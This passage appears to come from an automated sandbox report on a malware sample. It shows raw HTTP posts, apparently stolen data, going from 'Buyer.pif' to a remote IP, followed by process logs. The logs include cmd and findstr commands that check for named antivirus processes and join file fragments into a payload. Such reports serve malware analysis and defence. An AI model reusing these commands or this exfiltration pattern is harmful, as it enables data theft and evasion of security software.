                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 465
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:42 UTC465OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAFBGHCAKKFCAKEBKJKKCont
                                                                                                  2024-07-26 17:58:43 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:43 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.2.5497315.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:44 UTC325OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 130941
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FIIECFHDBAAECAAKFHDHCont
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 67 67 74 76 45 4d 4d 65 52 47 39 6f 6c 77 56 37 42 32 38 78 57 49 2b 75 77 66 6a 6b 39 36 39 50 41 2f 37 4e 57 54 70 61 58 30 5a 79 35 68 54 68 69 38 50 4c 32 73 55 33 46 58 2f 51 38 72 6f 6f 6f 72 37 73 2f 4e 41 6f 4e 46 46 41 43 56 36 48 38 4c 76 2b 52 66 31 44 2f 73 49 79 66 2b 67 4a 58 6e 75 4b 39 43 2b 46 33 2f 41 43 4c 2b 6f 66 38 41 59 52 6b 2f 39 41 53 76 6e 38 39 2f 35 64 65 72 2f 49 2b 77 34 57 2f 68 34 6e 30 6a 2b 5a 32 39 63 33 34 63 38 53 53 36 7a 71 57 6f 57 6b 30 63 53 2b 52 38 30 66 6c 67 35 43 37 32 58 61 2b 66 34 76 6c 42 34 39 66 61 75 67 6e 6e 69 74 62 65 53 34 6d 63 4a 46 45 70 64 32 50 51 41 63 6b 31 35 58 34 56 38 55 32 32 6e 36 72 71 6d 71 58 55 58 2b 6a 36 6c 4b 30 72 6d 46 43 7a 57 35 44 48 61 48 34 78 38 32 37 31 36 39 65 74 66
                                                                                                  Data Ascii: ggtvEMMeRG9olwV7B28xWI+uwfjk969PA/7NWTpaX0Zy5hThi8PL2sU3FX/Q8rooor7s/NAoNFFACV6H8Lv+Rf1D/sIyf+gJXnuK9C+F3/ACL+of8AYRk/9ASvn89/5der/I+w4W/h4n0j+Z29c34c8SS6zqWoWk0cS+R80flg5C72Xa+f4vlB49faugnnitbeS4mcJFEpd2PQAck15X4V8U22n6rqmqXUX+j6lK0rmFCzW5DHaH4x827169etf
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 30 76 54 46 4a 6e 2b 64 41 43 55 68 70 78 50 31 70 4d 65 6c 41 43 55 48 6d 6a 72 53 6e 33 6f 47 4a 2b 6c 42 34 6f 36 47 69 67 41 77 4f 74 4a 78 78 52 30 6f 50 31 7a 53 48 6f 42 70 4d 59 36 30 76 66 69 6b 6f 47 49 66 62 72 51 61 58 50 4a 39 71 51 2f 6c 37 30 41 49 4f 74 48 36 55 76 66 33 4e 49 4f 50 72 51 41 48 30 6f 49 6f 6f 4e 46 68 6e 65 31 30 76 67 51 34 38 53 4c 2f 77 42 63 58 2f 6c 58 4e 56 63 30 33 55 72 6a 53 62 76 37 56 61 6c 52 4b 46 4b 67 73 75 63 5a 72 6a 78 56 4f 56 57 6a 4b 45 64 32 65 42 67 61 30 61 4f 49 68 55 6e 73 6d 53 36 50 59 61 6c 34 6b 38 54 72 34 69 74 72 47 4f 47 30 6a 31 43 4a 6e 56 66 6c 36 4f 70 4f 42 33 49 48 4a 50 76 57 66 34 76 75 6e 68 38 58 36 6e 75 51 37 50 4f 4f 47 46 62 56 74 34 72 31 4f 7a 45 6f 74 76 73 38 51 6c 6b 4d
                                                                                                  Data Ascii: 0vTFJn+dACUhpxP1pMelACUHmjrSn3oGJ+lB4o6GigAwOtJxxR0oP1zSHoBpMY60vfikoGIfbrQaXPJ9qQ/l70AIOtH6Uvf3NIOPrQAH0oIooNFhne10vgQ48SL/wBcX/lXNVc03UrjSbv7ValRKFKgsucZrjxVOVWjKEd2eBga0aOIhUnsmS6PYal4k8Tr4itrGOG0j1CJnVfl6OpOB3IHJPvWf4vunh8X6nuQ7POOGFbVt4r1OzEotvs8QlkM
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 4d 30 77 67 30 38 39 4f 74 4e 49 39 36 51 78 4d 5a 34 78 2b 74 4a 2b 46 4c 2b 74 4a 33 2b 6c 53 78 69 59 70 4f 39 4c 52 7a 69 6c 30 47 6a 76 4f 39 52 58 4d 76 6b 57 37 79 38 66 4b 4f 39 53 31 48 63 51 72 63 57 37 77 74 39 31 78 67 31 79 75 39 74 44 35 69 4e 72 71 2b 78 6d 36 74 71 35 74 78 71 74 6e 61 36 63 58 4e 68 49 30 44 58 62 53 75 4a 47 6b 55 34 4a 43 37 74 6f 58 49 4f 41 56 4a 78 33 7a 7a 57 78 64 52 78 78 61 31 65 57 74 76 63 32 6a 71 75 70 52 32 49 68 53 5a 32 61 42 70 43 66 4c 33 6b 6a 48 4f 44 30 4c 59 36 48 42 34 72 49 76 6f 62 32 37 73 5a 37 65 53 79 73 6e 75 4a 6b 43 50 65 2f 4f 73 6a 67 64 32 41 62 59 57 78 78 75 32 35 37 35 7a 7a 56 63 32 32 73 4c 71 56 31 71 4d 61 57 67 75 4c 72 55 49 4e 52 6c 42 44 62 66 4d 69 4c 46 51 50 6d 2b 37 6c 6a
                                                                                                  Data Ascii: M0wg089OtNI96QxMZ4x+tJ+FL+tJ3+lSxiYpO9LRzil0GjvO9RXMvkW7y8fKO9S1HcQrcW7wt91xg1yu9tD5iNrq+xm6tq5txqtna6cXNhI0DXbSuJGkU4JC7toXIOAVJx3zzWxdRxxa1eWtvc2jqupR2IhSZ2aBpCfL3kjHOD0LY6HB4rIvob27sZ7eSysnuJkCPe/Osjgd2AbYWxxu2575zzVc22sLqV1qMaWguLrUINRlBDbfMiLFQPm+7lj
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 32 68 38 44 6e 6c 44 32 57 4d 6b 31 74 4c 58 2b 76 6d 46 46 46 46 65 67 65 51 46 46 46 46 41 48 72 6c 74 2f 78 35 77 2f 37 69 2f 79 70 7a 36 68 50 62 4b 56 6d 30 2b 64 6f 4d 66 4c 4e 42 2b 38 48 34 71 50 6d 48 34 41 31 48 62 48 2f 41 45 53 48 2f 63 58 2b 56 63 6c 46 34 79 6c 30 37 78 6e 71 56 74 65 45 76 61 42 59 30 6a 51 48 68 41 70 47 57 2f 4a 6e 59 2b 75 42 58 35 31 6c 64 47 56 57 76 55 55 56 65 79 76 2b 4b 50 31 54 46 56 6f 30 71 55 48 4a 32 76 38 41 35 48 62 47 39 67 2f 73 76 37 56 4c 4d 73 56 76 68 57 38 31 79 41 4e 70 78 67 38 2f 55 56 57 31 6f 4d 76 68 7a 55 55 5a 74 32 32 4a 73 48 48 74 54 5a 42 62 74 34 56 62 37 55 45 61 33 46 75 47 66 63 4d 6a 41 41 4f 61 68 75 68 4b 50 42 45 70 6d 7a 35 70 73 6c 4c 35 39 64 67 7a 2b 74 65 6e 53 69 6c 4e 50 7a
                                                                                                  Data Ascii: 2h8DnlD2WMk1tLX+vmFFFFegeQFFFFAHrlt/x5w/7i/ypz6hPbKVm0+doMfLNB+8H4qPmH4A1HbH/AESH/cX+VclF4yl07xnqVteEvaBY0jQHhApGW/JnY+uBX51ldGVWvUUVeyv+KP1TFVo0qUHJ2v8A5HbG9g/sv7VLMsVvhW81yANpxg8/UVW1oMvhzUUZt22JsHHtTZBbt4Vb7UEa3FuGfcMjAAOahuhKPBEpmz5pslL59dgz+tenSilNPz
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 58 72 78 6f 71 44 41 41 42 49 77 42 55 65 71 53 74 42 70 6c 78 4b 6e 33 6c 58 49 72 76 6f 31 6c 56 70 4b 71 74 6d 72 6e 6b 56 73 4e 4b 6c 58 64 42 76 56 4f 78 62 6f 71 44 55 72 34 44 78 54 65 57 75 2f 54 62 6d 33 74 70 4c 6c 30 74 4c 4f 32 4d 4d 67 38 71 4e 6e 45 62 74 35 61 62 73 6c 63 63 4d 33 66 42 72 4b 74 76 45 6b 73 6c 6c 44 71 4f 70 32 39 6b 71 77 36 68 61 6f 7a 51 51 4c 47 72 52 53 37 77 36 46 56 55 41 6b 42 64 77 4a 35 34 50 4e 63 43 7a 53 44 69 70 63 76 5a 2f 65 37 49 39 58 2b 77 71 6e 4d 34 38 36 36 2f 67 72 76 38 41 72 38 6a 63 6f 72 4e 74 6a 4c 74 74 39 4b 75 45 52 62 2b 32 75 6c 75 4c 31 2b 4e 79 32 78 6b 6b 6a 66 6e 50 51 43 4e 47 2f 77 43 42 31 44 44 72 6a 7a 2b 46 62 62 55 64 6d 6d 6c 5a 39 50 76 4c 6d 57 78 6a 74 67 4c 6c 69 5a 35 45 6a
                                                                                                  Data Ascii: XrxoqDAABIwBUeqStBplxKn3lXIrvo1lVpKqtmrnkVsNKlXdBvVOxboqDUr4DxTeWu/Tbm3tpLl0tLO2MMg8qNnEbt5abslccM3fBrKtvEksllDqOp29kqw6haozQQLGrRS7w6FVUAkBdwJ54PNcCzSDipcvZ/e7I9X+wqnM4866/grv8Ar8jcorNtjLtt9KuERb+2uluL1+Ny2xkkjfnPQCNG/wCB1DDrjz+FbbUdmmlZ9PvLmWxjtgLliZ5Ej
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 31 6c 46 75 4d 30 32 63 4c 52 54 70 49 33 69 6c 65 4b 56 47 6a 6b 51 37 58 52 68 67 71 66 53 6d 31 36 30 5a 4b 53 55 6f 75 36 5a 38 39 4f 45 71 63 6e 43 61 73 30 46 4a 32 70 61 53 71 45 46 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 51 61 4b 53 6d 41 55 55 55 55 44 43 6b 6f 6f 6f 41 4b 4b 4b 4b 59 41 61 53 6c 70 4b 42 68 52 52 52 51 41 6e 61 69 69 69 67 59 47 6b 70 61 53 67 41 70 4b 57 6b 6f 47 46 46 46 46 41 43 55 55 74 4a 51 4d 53 69 67 30 55 44 51 55 47 6a 74 53 55 41 46 4a 53 30 6c 41 77 6f 4e 42 36 55 6c 41 77 70 4b 57 6b 70 67 46 46 46 46 41 43 55 55 70 70 4b 42 69 47 69 6c 4e 4a 51 41 55 6c 46 46 41 78 44 52 52 52 52 59 59 55 6c 47 52 53 45 30 39 42 67 61 44 78 54 63 35 70 4b 42 32 46 4c 65 31 4a 6b 30 6e 61 69 67 59 55 6c 4c 53 55 68 6f 4b 53
                                                                                                  Data Ascii: 1lFuM02cLRTpI3ileKVGjkQ7XRhgqfSm160ZKSUou6Z89OEqcnCas0FJ2paSqEFFFFABRRRQAlFFFABQaKSmAUUUUDCkoooAKKKKYAaSlpKBhRRRQAnaiiigYGkpaSgApKWkoGFFFFACUUtJQMSig0UDQUGjtSUAFJS0lAwoNB6UlAwpKWkpgFFFFACUUppKBiGilNJQAUlFFAxDRRRRYYUlGRSE09BgaDxTc5pKB2FLe1Jk0naigYUlLSUhoKS
                                                                                                  2024-07-26 17:58:45 UTC16355OUTData Raw: 4d 78 68 47 4f 63 44 6a 47 50 79 72 47 7a 54 43 2b 33 63 57 56 77 46 43 6b 6b 6f 51 41 47 47 56 35 78 33 41 4f 50 57 6c 33 44 35 4d 68 67 48 42 4b 45 71 51 47 41 4f 43 52 36 38 67 69 76 51 6f 78 70 30 34 4b 45 48 6f 6a 79 4d 54 55 72 56 36 6a 71 31 56 71 39 39 50 6b 4c 52 52 52 57 78 7a 43 31 58 76 34 57 75 4c 4b 53 4a 50 76 45 44 48 34 48 4e 57 31 74 37 68 72 55 33 61 32 74 79 31 71 41 53 5a 78 43 78 6a 47 4f 76 7a 59 78 55 51 63 4d 59 51 6f 59 6d 62 2f 56 59 55 2f 76 4f 63 66 4c 36 38 38 63 64 36 77 71 71 6e 57 70 79 70 53 65 6a 54 54 2b 5a 31 34 53 70 58 77 6c 65 6e 69 61 63 66 65 67 31 4a 58 57 6c 30 30 31 38 72 6e 62 57 33 78 50 73 2f 49 54 37 58 70 4f 70 4c 4f 42 68 78 44 45 72 4c 6e 76 67 6c 68 78 55 55 76 6a 7a 77 33 4e 61 53 32 6b 76 68 36 2b 6b
                                                                                                  Data Ascii: MxhGOcDjGPyrGzTC+3cWVwFCkkoQAGGV5x3AOPWl3D5MhgHBKEqQGAOCR68givQoxp04KEHojyMTUrV6jq1Vq99PkLRRRWxzC1Xv4WuLKSJPvEDH4HNW1t7hrU3a2ty1qASZxCxjGOvzYxUQcMYQoYmb/VYU/vOcfL688cd6wqqnWpypSejTT+Z14SpXwleniacfeg1JXWl0018rnbW3xPs/IT7XpOpLOBhxDErLnvglhxUUvjzw3NaS2kvh6+k
                                                                                                  2024-07-26 17:58:45 UTC101OUTData Raw: 7a 76 48 62 72 47 52 6a 79 31 6a 42 32 68 63 63 59 78 30 72 6e 36 4b 4b 59 42 56 79 54 2f 6b 43 32 76 2f 58 78 4e 2f 36 44 48 56 4f 72 6b 6e 2f 49 46 74 66 2b 76 69 62 2f 41 4e 42 6a 6f 41 2f 2f 32 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 2d 2d 0d 0a
                                                                                                  Data Ascii: zvHbrGRjy1jB2hccYx0rn6KKYBVyT/kC2v/XxN/6DHVOrkn/IFtf+vib/ANBjoA//2Q==------FIIECFHDBAAECAAKFHDH--
                                                                                                  2024-07-26 17:58:46 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:46 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  22192.168.2.5497325.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:47 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IIJDBGDGCGDAKFIDGIDBCont
                                                                                                  2024-07-26 17:58:47 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:47 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.2.5497335.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:48 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------CAEHJEBKFCAKKFIEHDBFCont
                                                                                                  2024-07-26 17:58:49 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:48 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:13:57:53
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:867'038 bytes
                                                                                                  MD5 hash:569720E2C07B1D34BAC1366BF2B1C97A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x1000000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x1000000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c md 447331
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /V "typesfaxincreasecompound" Ensemble
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
